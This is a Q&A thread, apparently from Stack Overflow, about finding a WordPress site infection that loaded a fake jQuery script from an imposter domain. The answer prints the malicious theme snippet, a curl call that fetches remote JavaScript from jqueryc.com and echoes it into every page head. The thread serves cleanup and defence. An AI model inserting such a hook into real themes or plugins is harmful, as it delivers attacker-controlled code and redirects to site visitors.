Reputation: 331
Jquery"s" Malware Script
My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.
this is the malicious script: http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js
This is the site: (removed now)
I have checked everywhere for it and have not been successful.
Any help would be greatly appreciated.
Thank you.
**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.
Upvotes: 3
Views: 5029
Answers (1)
Reputation: 54359
Writing up all the comments as an answer, as there is good info here to combat an exploit.
Problem
A script with a URL posing as a jQuery CDN was found in the source of a Wordpress-driven site. It sounds like both jquerys.com and jqueryc.com were being used as imposter domains.
The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.
Possible Causes
- A mistake typing the URL
- Compromised server
- A malicious theme
- A malicious plugin
Resolution
Start with: http://codex.wordpress.org/FAQ_My_site_was_hacked
OP found this code inside the theme:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.
It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a compromised server). Backups shouldn't be restored without examining them for the malicious code.
Related Links
Upvotes: 8
Related Questions
- Javascript "virus"
- Malicious JavaScript code
- unknown scripts are running and redirecting on click to unknown websties
- How does this site infecting script work?
- Finding malware on website
- jQuery.min.php Malware on my site
- Javascript Malware Detected by Google Scanner
- How does Javascript Malware work?
- This site may be distributing malware ? strange javascript?
- how can i remove script virus from my script